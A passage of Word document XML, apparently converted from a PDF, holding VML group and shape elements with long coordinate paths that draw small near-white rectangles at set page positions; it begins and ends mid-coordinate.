854,9689,6853,9689,6852,9689,6851,9689,6850,9689,6850,9689,6849,9689,6848,9689,6847,9689,6846,9689,6845,9689,6844,9689,6843,9689,6842,9689,6841,9689,6840,9689,6839,9689,6837,9689,6836,9689,6835,9689,6834,9689,6832,9689,6831,9689,6830,9689,6828,9689,6827,9689,6825,9689,6824,9689,6822,9689,6821,9689,6819,9689,6817,9689,6816,9689,6814,9689,6812,9689,6810,9689,6808,9689,6806,9689,6804,9689,6802,9689,6800,9689,6798,9689,6796,9689,6794,9689,6792,9689,6790,9689,6787,9689,6785,9689,6783,9689,6780,9689,6778,9689,6775,9689,6773,9689,6770,9689,6767,9689,6765,9689,6762,9689,6759,9689,6756,9689,6753,9689,6750,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9689,6747,9688,6747,9688,6747,9688,6747,9688,6747,9688,6747,9688,6747,9688,6747,9687,6747,9687,6747,9687,6747,9687,6747,9687,6747,9686,6747,9686,6747,9686,6747,9685,6747,9685,6747,9684,6747,9684,6747,9683,6747,9683,6747,9682,6747,9682,6747,9681,6747,9681,6747,9680,6747,9679,6747,9678,6747,9678,6747,9677,6747,9676,6747,9675,6747,9674,6747,9673,6747,9672,6747,9671,6747,9670,6747,9669,6747,9668,6747,9666,6747,9665,6747,9664,6747,9662,6747,9661,6747,9659,6747,9658,6747,9656,6747,9655,6747,9653,6747,9651,6747,9649,6747,9647,6747,9645,6747,9643,6747,9641,6747,9639,6747,9637,6747,9635,6747,9632,6747,9630,6747,9628,6747,9625,6747,9622,6747,9620,6747,9617,6747,9614,6747,9611,6747,9608,6747,9605,6747,9602,6747,9599,6747,9596,6747,9593,6747,9589,6747,9586,6747,9582,6747,9579,6747,9575,6747,9571,6747,9567,6747,9563,6747,9559,6747,9555,6747,9551,6747,9546,6747,9542,6747,9537,6747,9533,6747,9528,6747,9523,6747,9519,6747,9514,6747,9509,6747,9503,6747,9498,6747,9493,6747,9487,6747,9482,6747,9476,6747,9470,6747,9465,6747,9459,6747,9453,6747,9446,6747,9440,6747,9434e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:336.500pt;margin-top:520.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6730,10410" coordsize="130,270">
        <v:shape style="position:absolute;left:6730;top:10410;width:130;height:270" coordorigin="6730,10410" coordsize="130,270" path="m6747,10439l6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6747,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6748,10439,6749,10439,6749,10439,6749,10439,6749,10439,6749,10439,6749,10439,6750,10439,6750,10439,6750,10439,6750,10439,6750,10439,6751,10439,6751,10439,6751,10439,6752,10439,6752,10439,6752,10439,6753,10439,6753,10439,6753,10439,6754,10439,6754,10439,6755,10439,6755,10439,6756,10439,6756,10439,6757,10439,6757,10439,6758,10439,6759,10439,6759,10439,6760,10439,6761,10439,6761,10439,6762,10439,6763,10439,6764,10439,6764,10439,6765,10439,6766,10439,6767,10439,6768,10439,6769,10439,6770,10439,6771,10439,6772,10439,6773,10439,6774,10439,6775,10439,6776,10439,6777,10439,6779,10439,6780,10439,6781,10439,6783,10439,6784,10439,6785,10439,6787,10439,6788,10439,6790,10439,6791,10439,6793,10439,6794,10439,6796,10439,6798,10439,6799,10439,6801,10439,6803,10439,6805,10439,6807,10439,6808,10439,6810,10439,6812,10439,6814,10439,6817,10439,6819,10439,6821,10439,6823,10439,6825,10439,6828,10439,6830,10439,6832,10439,6835,10439,6837,10439,6840,10439,6842,10439,6845,10439,6847,10439,6850,10439,6853,10439,6856,10439,6859,10439,6862,10439,6864,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10439,6867,10440,6867,10440,6867,10440,6867,10440,6867,10440,6867,10440,6867,10440,6867,10440,6867,10440,6867,10441,6867,10441,6867,10441,6867,10441,6867,10442,6867,10442,6867,10442,6867,10443,6867,10443,6867,10443,6867,10444,6867,10444,6867,10445,6867,10445,6867,10446,6867,10446,6867,10447,6867,10448,6867,10448,6867,10449,6867,10450,6867,10450,6867,10451,6867,10452,6867,10453,6867,10454,6867,10455,6867,10456,6867,10457,6867,10458,6867,10459,6867,10461,6867,10462,6867,10463,6867,10464,6867,10466,6867,10467,6867,10469,6867,10470,6867,10472,6867,10474,6867,10475,6867,10477,6867,10479,6867,10481,6867,10483,6867,10485,6867,10487,6867,10489,6867,10491,6867,10493,6867,10496,6867,10498,6867,10501,6867,10503,6867,10506,6867,10508,6867,10511,6867,10514,6867,10517,6867,10520,6867,10523,6867,10526,6867,10529,6867,10532,6867,10536,6867,10539,6867,10542,6867,10546,6867,10550,6867,10553,6867,10557,6867,10561,6867,10565,6867,10569,6867,10573,6867,10577,6867,10582,6867,10586,6867,10591,6867,10595,6867,10600,6867,10605,6867,10610,6867,10615,6867,10620,6867,10625,6867,10630,6867,10635,6867,10641,6867,10646,6867,10652,6867,10658,6867,10664,6867,10670,6867,10676,6867,10682,6867,10688,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6867,10694,6866,10694,6866,10694,6866,10694,6866,10694,6866,10694,6866,10694,6866,10694,6865,10694,6865,10694,6865,10694,6865,10694,6864,10694,6864,10694,6864,10694,6864,10694,6863,10694,6863,10694,6863,10694,6862,10694,6862,10694,6861,10694,6861,10694,6861,10694,6860,10694,6860,10694,6859,10694,6859,10694,6858,10694,6857,10694,6857,10694,6856,10694,6856,10694,6855,10694,6854,10694,6854,10694,6853,10694,6852,10694,6851,10694,6850,10694,6850,10694,6849,10694,6848,10694,6847,10694,6846,10694,6845,10694,6844,10694,6843,10694,6842,10694,6841,10694,6840,10694,6839,10694,6837,10694,6836,10694,6835,10694,6834,10694,6832,10694,6831,10694,6830,10694,6828,10694,6827,10694,6825,10694,6824,10694,6822,10694,6821,10694,6819,10694,6817,10694,6816,10694,6814,10694,6812,10694,6810,10694,6808,10694,6806,10694,6804,10694,6802,10694,6800,10694,6798,10694,6796,10694,6794,10694,6792,10694,6790,10694,6787,10694,6785,10694,6783,10694,6780,10694,6778,10694,6775,10694,6773,10694,6770,10694,6767,10694,6765,10694,6762,10694,6759,10694,6756,10694,6753,10694,6750,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10694,6747,10693,6747,10693,6747,10693,6747,10693,6747,10693,6747,10693,6747,10692,6747,10692,6747,10692,6747,10691,6747,10691,6747,10691,6747,10690,6747,10690,6747,10689,6747,10689,6747,10688,6747,10688,6747,10687,6747,10687,6747,10686,6747,10685,6747,10685,6747,10684,6747,10683,6747,10682,6747,10681,6747,10681,6747,10680,6747,10679,6747,10678,6747,10677,6747,10675,6747,10674,6747,10673,6747,10672,6747,10671,6747,10669,6747,10668,6747,10666,6747,10665,6747,10663,6747,10662,6747,10660,6747,10658,6747,10657,6747,10655,6747,10653,6747,10651,6747,10649,6747,10647,6747,10645,6747,10642,6747,10640,6747,10638,6747,10635,6747,10633,6747,10631,6747,10628,6747,10625,6747,10623,6747,10620,6747,10617,6747,10614,6747,10611,6747,10608,6747,10605,6747,10601,6747,10598,6747,10595,6747,10591,6747,10588,6747,10584,6747,10580,6747,10576,6747,10573,6747,10569,6747,10565,6747,10560,6747,10556,6747,10552,6747,10547,6747,10543,6747,10538,6747,10534,6747,10529,6747,10524,6747,10519,6747,10514,6747,10509,6747,10504,6747,10498,6747,10493,6747,10487,6747,10482,6747,10476,6747,10470,6747,10464,6747,10458,6747,10452,6747,10446,6747,10439e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:240.500pt;margin-top:571.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4810,11430" coordsize="130,270">
        <v:shape style="position:absolute;left:4810;top:11430;width:130;height:270" coordorigin="4810,11430" coordsize="130,270" path="m4826,11445l4826,11445,4826,11445,4826,11445,4826,11445,4826,11445,4826,11445,4826,11445,4826,11445,4826,11445,4826,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4827,11445,4828,11445,4828,11445,4828,11445,4828,11445,4828,11445,4828,11445,4829,11445,4829,11445,4829,11445,4829,11445,4829,11445,4830,11445,4830,11445,4830,11445,4831,11445,4831,11445,4831,11445,4832,11445,4832,11445,4833,11445,4833,11445,4833,11445,4834,11445,4834,11445,4835,11445,4835,11445,4836,11445,4836,11445,4837,11445,4838,11445,4838,11445,4839,11445,4840,11445,4840,11445,4841,11445,4842,11445,4843,11445,4843,11445,4844,11445,4845,11445,4846,11445,4847,11445,4848,11445,4849,11445,4850,11445,4851,11445,4852,11445,4853,11445,4854,11445,4855,11445,4856,11445,4858,11445,4859,11445,4860,11445,4862,11445,4863,11445,4864,11445,4866,11445,4867,11445,4869,11445,4870,11445,4872,11445,4873,11445,4875,11445,4877,11445,4878,11445,4880,11445,4882,11445,4884,11445,4886,11445,4888,11445,4889,11445,4891,11445,4893,11445,4896,11445,4898,11445,4900,11445,4902,11445,4904,11445,4907,11445,4909,11445,4911,11445,4914,11445,4916,11445,4919,11445,4921,11445,4924,11445,4927,11445,4929,11445,4932,11445,4935,11445,4938,11445,4941,11445,4943,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11445,4946,11446,4946,11446,4946,11446,4946,11446,4946,11446,4946,11446,4946,11447,4946,11447,4946,11447,4946,11447,4946,11448,4946,11448,4946,11448,4946,11449,4946,11449,4946,11450,4946,11450,4946,11451,4946,11451,4946,11452,4946,11452,4946,11453,4946,11454,4946,11454,4946,11455,4946,11456,4946,11457,4946,11458,4946,11459,4946,11459,4946,11460,4946,11462,4946,11463,4946,11464,4946,11465,4946,11466,4946,11467,4946,11469,4946,11470,4946,11471,4946,11473,4946,11474,4946,11476,4946,11477,4946,11479,4946,11481,4946,11483,4946,11484,4946,11486,4946,11488,4946,11490,4946,11492,4946,11494,4946,11497,4946,11499,4946,11501,4946,11504,4946,11506,4946,11509,4946,11511,4946,11514,4946,11517,4946,11519,4946,11522,4946,11525,4946,11528,4946,11531,4946,11534,4946,11538,4946,11541,4946,11544,4946,11548,4946,11551,4946,11555,4946,11559,4946,11563,4946,11567,4946,11571,4946,11575,4946,11579,4946,11583,4946,11587,4946,11592,4946,11596,4946,11601,4946,11605,4946,11610,4946,11615,4946,11620,4946,11625,4946,11630,4946,11635,4946,11641,4946,11646,4946,11652,4946,11657,4946,11663,4946,11669,4946,11675,4946,11681,4946,11687,4946,11694,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4946,11700,4945,11700,4945,11700,4945,11700,4945,11700,4945,11700,4945,11700,4944,11700,4944,11700,4944,11700,4944,11700,4943,11700,4943,11700,4943,11700,4943,11700,4942,11700,4942,11700,4942,11700,4941,11700,4941,11700,4940,11700,4940,11700,4940,11700,4939,11700,4939,11700,4938,11700,4938,11700,4937,11700,4936,11700,4936,11700,4935,11700,4935,11700,4934,11700,4933,11700,4933,11700,4932,11700,4931,11700,4930,11700,4930,11700,4929,11700,4928,11700,4927,11700,4926,11700,4925,11700,4924,11700,4923,11700,4922,11700,4921,11700,4920,11700,4919,11700,4918,11700,4916,11700,4915,11700,4914,11700,4913,11700,4911,11700,4910,11700,4909,11700,4907,11700,4906,11700,4904,11700,4903,11700,4901,11700,4900,11700,4898,11700,4896,11700,4895,11700,4893,11700,4891,11700,4889,11700,4887,11700,4885,11700,4883,11700,4881,11700,4879,11700,4877,11700,4875,11700,4873,11700,4871,11700,4869,11700,4866,11700,4864,11700,4862,11700,4859,11700,4857,11700,4854,11700,4852,11700,4849,11700,4846,11700,4844,11700,4841,11700,4838,11700,4835,11700,4832,11700,4829,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11700,4826,11699,4826,11699,4826,11699,4826,11699,4826,11699,4826,11699,4826,11699,4826,11698,4826,11698,4826,11698,4826,11698,4826,11698,4826,11697,4826,11697,4826,11697,4826,11696,4826,11696,4826,11695,4826,11695,4826,11694,4826,11694,4826,11693,4826,11693,4826,11692,4826,11692,4826,11691,4826,11690,4826,11689,4826,11689,4826,11688,4826,11687,4826,11686,4826,11685,4826,11684,4826,11683,4826,11682,4826,11681,4826,11680,4826,11679,4826,11677,4826,11676,4826,11675,4826,11673,4826,11672,4826,11670,4826,11669,4826,11667,4826,11666,4826,11664,4826,11662,4826,11660,4826,11658,4826,11656,4826,11654,4826,11652,4826,11650,4826,11648,4826,11646,4826,11643,4826,11641,4826,11639,4826,11636,4826,11633,4826,11631,4826,11628,4826,11625,4826,11622,4826,11619,4826,11616,4826,11613,4826,11610,4826,11607,4826,11604,4826,11600,4826,11597,4826,11593,4826,11590,4826,11586,4826,11582,4826,11578,4826,11574,4826,11570,4826,11566,4826,11562,4826,11557,4826,11553,4826,11548,4826,11544,4826,11539,4826,11534,4826,11530,4826,11525,4826,11520,4826,11514,4826,11509,4826,11504,4826,11498,4826,11493,4826,11487,4826,11481,4826,11476,4826,11470,4826,11464,4826,11457,4826,11451,4826,11445e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:246.500pt;margin-top:590.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4930,11810" coordsize="130,250">
        <v:shape style="position:absolute;left:4930;top:11810;width:130;height:250" coordorigin="4930,11810" coordsize="130,250" path="m4946,11820l4946,11820,4946,11820,4946,11820,4946,11820,4946,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4947,11820,4948,11820,4948,11820,4948,11820,4948,11820,4948,11820,4948,11820,4949,11820,4949,11820,4949,11820,4949,11820,4950,11820,4950,11820,4950,11820,4950,11820,4951,11820,4951,11820,4951,11820,4952,11820,4952,11820,4953,11820,4953,11820,4953,11820,4954,11820,4954,11820,4955,11820,4955,11820,4956,11820,4957,11820,4957,11820,4958,11820,4958,11820,4959,11820,4960,11820,4960,11820,4961,11820,4962,11820,4963,11820,4963,11820,4964,11820,4965,11820,4966,11820,4967,11820,4968,11820,4969,11820,4970,11820,4971,11820,4972,11820,4973,11820,4974,11820,4975,11820,4977,11820,4978,11820,4979,11820,4980,11820,4982,11820,4983,11820,4984,11820,4986,11820,4987,11820,4989,11820,4990,11820,4992,11820,4993,11820,4995,11820,4997,11820,4998,11820,5000,11820,5002,11820,5004,11820,5006,11820,5008,11820,5010,11820,5012,11820,5014,11820,5016,11820,5018,11820,5020,11820,5022,11820,5024,11820,5027,11820,5029,11820,5031,11820,5034,11820,5036,11820,5039,11820,5041,11820,5044,11820,5047,11820,5049,11820,5052,11820,5055,11820,5058,11820,5061,11820,5064,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11820,5067,11821,5067,11821,5067,11821,5067,11821,5067,11821,5067,11821,5067,11822,5067,11822,5067,11822,5067,11822,5067,11823,5067,11823,5067,11823,5067,11824,5067,11824,5067,11824,5067,11825,5067,11825,5067,11826,5067,11826,5067,11827,5067,11828,5067,11828,5067,11829,5067,11830,5067,11830,5067,11831,5067,11832,5067,11833,5067,11834,5067,11835,5067,11836,5067,11837,5067,11838,5067,11839,5067,11840,5067,11841,5067,11842,5067,11844,5067,11845,5067,11847,5067,11848,5067,11849,5067,11851,5067,11853,5067,11854,5067,11856,5067,11858,5067,11860,5067,11862,5067,11863,5067,11865,5067,11868,5067,11870,5067,11872,5067,11874,5067,11876,5067,11879,5067,11881,5067,11884,5067,11886,5067,11889,5067,11892,5067,11895,5067,11897,5067,11900,5067,11903,5067,11907,5067,11910,5067,11913,5067,11916,5067,11920,5067,11923,5067,11927,5067,11930,5067,11934,5067,11938,5067,11942,5067,11946,5067,11950,5067,11954,5067,11958,5067,11962,5067,11967,5067,11971,5067,11976,5067,11981,5067,11985,5067,11990,5067,11995,5067,12000,5067,12005,5067,12011,5067,12016,5067,12021,5067,12027,5067,12033,5067,12038,5067,12044,5067,12050,5067,12056,5067,12062,5067,12069,5067,12075,5067,12075,5067,12075,5067,12075,5067,12075,5067,12075,5067,12075,5067,12075,5067,12075,5067,12075,5067,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5066,12075,5065,12075,5065,12075,5065,12075,5065,12075,5065,12075,5065,12075,5064,12075,5064,12075,5064,12075,5064,12075,5063,12075,5063,12075,5063,12075,5063,12075,5062,12075,5062,12075,5062,12075,5061,12075,5061,12075,5060,12075,5060,12075,5060,12075,5059,12075,5059,12075,5058,12075,5058,12075,5057,12075,5057,12075,5056,12075,5055,12075,5055,12075,5054,12075,5053,12075,5053,12075,5052,12075,5051,12075,5050,12075,5050,12075,5049,12075,5048,12075,5047,12075,5046,12075,5045,12075,5044,12075,5043,12075,5042,12075,5041,12075,5040,12075,5039,12075,5038,12075,5036,12075,5035,12075,5034,12075,5033,12075,5031,12075,5030,12075,5029,12075,5027,12075,5026,12075,5024,12075,5023,12075,5021,12075,5020,12075,5018,12075,5016,12075,5015,12075,5013,12075,5011,12075,5009,12075,5007,12075,5005,12075,5004,12075,5002,12075,4999,12075,4997,12075,4995,12075,4993,12075,4991,12075,4989,12075,4986,12075,4984,12075,4982,12075,4979,12075,4977,12075,4974,12075,4972,12075,4969,12075,4966,12075,4964,12075,4961,12075,4958,12075,4955,12075,4952,12075,4949,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12075,4946,12074,4946,12074,4946,12074,4946,12074,4946,12074,4946,12074,4946,12073,4946,12073,4946,12073,4946,12073,4946,12072,4946,12072,4946,12072,4946,12071,4946,12071,4946,12071,4946,12070,4946,12070,4946,12069,4946,12069,4946,12068,4946,12067,4946,12067,4946,12066,4946,12065,4946,12065,4946,12064,4946,12063,4946,12062,4946,12061,4946,12060,4946,12059,4946,12058,4946,12057,4946,12056,4946,12055,4946,12054,4946,12053,4946,12051,4946,12050,4946,12048,4946,12047,4946,12046,4946,12044,4946,12042,4946,12041,4946,12039,4946,12037,4946,12035,4946,12034,4946,12032,4946,12030,4946,12027,4946,12025,4946,12023,4946,12021,4946,12019,4946,12016,4946,12014,4946,12011,4946,12009,4946,12006,4946,12003,4946,12000,4946,11998,4946,11995,4946,11992,4946,11989,4946,11985,4946,11982,4946,11979,4946,11975,4946,11972,4946,11968,4946,11965,4946,11961,4946,11957,4946,11953,4946,11949,4946,11945,4946,11941,4946,11937,4946,11933,4946,11928,4946,11924,4946,11919,4946,11914,4946,11910,4946,11905,4946,11900,4946,11895,4946,11890,4946,11884,4946,11879,4946,11874,4946,11868,4946,11862,4946,11857,4946,11851,4946,11845,4946,11839,4946,11833,4946,11826,4946,11820e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:312.500pt;margin-top:608.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6250,12170" coordsize="130,250">
        <v:shape style="position:absolute;left:6250;top:12170;width:130;height:250" coordorigin="6250,12170" coordsize="130,250" path="m6267,12180l6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6267,12180,6268,12180,6268,12180,6268,12180,6268,12180,6268,12180,6268,12180,6268,12180,6268,12180,6268,12180,6268,12180,6269,12180,6269,12180,6269,12180,6269,12180,6269,12180,6269,12180,6270,12180,6270,12180,6270,12180,6270,12180,6271,12180,6271,12180,6271,12180,6272,12180,6272,12180,6272,12180,6273,12180,6273,12180,6274,12180,6274,12180,6275,12180,6275,12180,6276,12180,6276,12180,6277,12180,6277,12180,6278,12180,6278,12180,6279,12180,6280,12180,6280,12180,6281,12180,6282,12180,6283,12180,6283,12180,6284,12180,6285,12180,6286,12180,6287,12180,6288,12180,6289,12180,6290,12180,6291,12180,6292,12180,6293,12180,6294,12180,6295,12180,6296,12180,6297,12180,6298,12180,6300,12180,6301,12180,6302,12180,6304,12180,6305,12180,6306,12180,6308,12180,6309,12180,6311,12180,6312,12180,6314,12180,6316,12180,6317,12180,6319,12180,6321,12180,6323,12180,6324,12180,6326,12180,6328,12180,6330,12180,6332,12180,6334,12180,6336,12180,6338,12180,6341,12180,6343,12180,6345,12180,6347,12180,6350,12180,6352,12180,6354,12180,6357,12180,6359,12180,6362,12180,6365,12180,6367,12180,6370,12180,6373,12180,6376,12180,6378,12180,6381,12180,6384,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12180,6387,12181,6387,12181,6387,12181,6387,12181,6387,12181,6387,12181,6387,12181,6387,12182,6387,12182,6387,12182,6387,12182,6387,12182,6387,12183,6387,12183,6387,12183,6387,12184,6387,12184,6387,12185,6387,12185,6387,12186,6387,12186,6387,12187,6387,12187,6387,12188,6387,12188,6387,12189,6387,12190,6387,12191,6387,12191,6387,12192,6387,12193,6387,12194,6387,12195,6387,12196,6387,12197,6387,12198,6387,12199,6387,12200,6387,12201,6387,12203,6387,12204,6387,12205,6387,12207,6387,12208,6387,12210,6387,12211,6387,12213,6387,12214,6387,12216,6387,12218,6387,12220,6387,12222,6387,12224,6387,12226,6387,12228,6387,12230,6387,12232,6387,12234,6387,12237,6387,12239,6387,12241,6387,12244,6387,12247,6387,12249,6387,12252,6387,12255,6387,12258,6387,12261,6387,12264,6387,12267,6387,12270,6387,12273,6387,12276,6387,12280,6387,12283,6387,12287,6387,12290,6387,12294,6387,12298,6387,12302,6387,12306,6387,12310,6387,12314,6387,12318,6387,12323,6387,12327,6387,12332,6387,12336,6387,12341,6387,12346,6387,12350,6387,12355,6387,12360,6387,12366,6387,12371,6387,12376,6387,12382,6387,12387,6387,12393,6387,12399,6387,12404,6387,12410,6387,12416,6387,12423,6387,12429,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6387,12435,6386,12435,6386,12435,6386,12435,6386,12435,6386,12435,6386,12435,6386,12435,6385,12435,6385,12435,6385,12435,6385,12435,6385,12435,6384,12435,6384,12435,6384,12435,6384,12435,6383,12435,6383,12435,6383,12435,6382,12435,6382,12435,6382,12435,6381,12435,6381,12435,6380,12435,6380,12435,6379,12435,6379,12435,6378,12435,6378,12435,6377,12435,6377,12435,6376,12435,6375,12435,6375,12435,6374,12435,6373,12435,6373,12435,6372,12435,6371,12435,6370,12435,6369,12435,6369,12435,6368,12435,6367,12435,6366,12435,6365,12435,6364,12435,6363,12435,6362,12435,6361,12435,6360,12435,6358,12435,6357,12435,6356,12435,6355,12435,6353,12435,6352,12435,6351,12435,6349,12435,6348,12435,6346,12435,6345,12435,6343,12435,6342,12435,6340,12435,6339,12435,6337,12435,6335,12435,6334,12435,6332,12435,6330,12435,6328,12435,6326,12435,6324,12435,6322,12435,6320,12435,6318,12435,6316,12435,6314,12435,6312,12435,6309,12435,6307,12435,6305,12435,6302,12435,6300,12435,6297,12435,6295,12435,6292,12435,6290,12435,6287,12435,6284,12435,6282,12435,6279,12435,6276,12435,6273,12435,6270,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12435,6267,12434,6267,12434,6267,12434,6267,12434,6267,12434,6267,12433,6267,12433,6267,12433,6267,12433,6267,12432,6267,12432,6267,12432,6267,12431,6267,12431,6267,12430,6267,12430,6267,12429,6267,12429,6267,12428,6267,12428,6267,12427,6267,12426,6267,12426,6267,12425,6267,12424,6267,12423,6267,12422,6267,12421,6267,12421,6267,12420,6267,12419,6267,12417,6267,12416,6267,12415,6267,12414,6267,12413,6267,12411,6267,12410,6267,12409,6267,12407,6267,12406,6267,12404,6267,12403,6267,12401,6267,12399,6267,12397,6267,12396,6267,12394,6267,12392,6267,12390,6267,12388,6267,12386,6267,12383,6267,12381,6267,12379,6267,12376,6267,12374,6267,12371,6267,12369,6267,12366,6267,12363,6267,12361,6267,12358,6267,12355,6267,12352,6267,12349,6267,12346,6267,12342,6267,12339,6267,12336,6267,12332,6267,12329,6267,12325,6267,12321,6267,12317,6267,12313,6267,12310,6267,12305,6267,12301,6267,12297,6267,12293,6267,12288,6267,12284,6267,12279,6267,12275,6267,12270,6267,12265,6267,12260,6267,12255,6267,12250,6267,12245,6267,12239,6267,12234,6267,12228,6267,12223,6267,12217,6267,12211,6267,12205,6267,12199,6267,12193,6267,12187,6267,12180e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:246.500pt;margin-top:626.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4930,12530" coordsize="130,270">
        <v:shape style="position:absolute;left:4930;top:12530;width:130;height:270" coordorigin="4930,12530" coordsize="130,270" path="m4946,12555l4946,12555,4946,12555,4946,12555,4946,12555,4946,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4947,12555,4948,12555,4948,12555,4948,12555,4948,12555,4948,12555,4948,12555,4949,12555,4949,12555,4949,12555,4949,12555,4950,12555,4950,12555,4950,12555,4950,12555,4951,12555,4951,12555,4951,12555,4952,12555,4952,12555,4953,12555,4953,12555,4953,12555,4954,12555,4954,12555,4955,12555,4955,12555,4956,12555,4957,12555,4957,12555,4958,12555,4958,12555,4959,12555,4960,12555,4960,12555,4961,12555,4962,12555,4963,12555,4963,12555,4964,12555,4965,12555,4966,12555,4967,12555,4968,12555,4969,12555,4970,12555,4971,12555,4972,12555,4973,12555,4974,12555,4975,12555,4977,12555,4978,12555,4979,12555,4980,12555,4982,12555,4983,12555,4984,12555,4986,12555,4987,12555,4989,12555,4990,12555,4992,12555,4993,12555,4995,12555,4997,12555,4998,12555,5000,12555,5002,12555,5004,12555,5006,12555,5008,12555,5010,12555,5012,12555,5014,12555,5016,12555,5018,12555,5020,12555,5022,12555,5024,12555,5027,12555,5029,12555,5031,12555,5034,12555,5036,12555,5039,12555,5041,12555,5044,12555,5047,12555,5049,12555,5052,12555,5055,12555,5058,12555,5061,12555,5064,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12555,5067,12556,5067,12556,5067,12556,5067,12556,5067,12556,5067,12556,5067,12556,5067,12556,5067,12556,5067,12557,5067,12557,5067,12557,5067,12557,5067,12557,5067,12558,5067,12558,5067,12558,5067,12559,5067,12559,5067,12559,5067,12560,5067,12560,5067,12561,5067,12561,5067,12562,5067,12562,5067,12563,5067,12564,5067,12564,5067,12565,5067,12566,5067,12567,5067,12567,5067,12568,5067,12569,5067,12570,5067,12571,5067,12572,5067,12573,5067,12574,5067,12575,5067,12577,5067,12578,5067,12579,5067,12581,5067,12582,5067,12583,5067,12585,5067,12586,5067,12588,5067,12590,5067,12591,5067,12593,5067,12595,5067,12597,5067,12599,5067,12601,5067,12603,5067,12605,5067,12607,5067,12610,5067,12612,5067,12614,5067,12617,5067,12619,5067,12622,5067,12624,5067,12627,5067,1263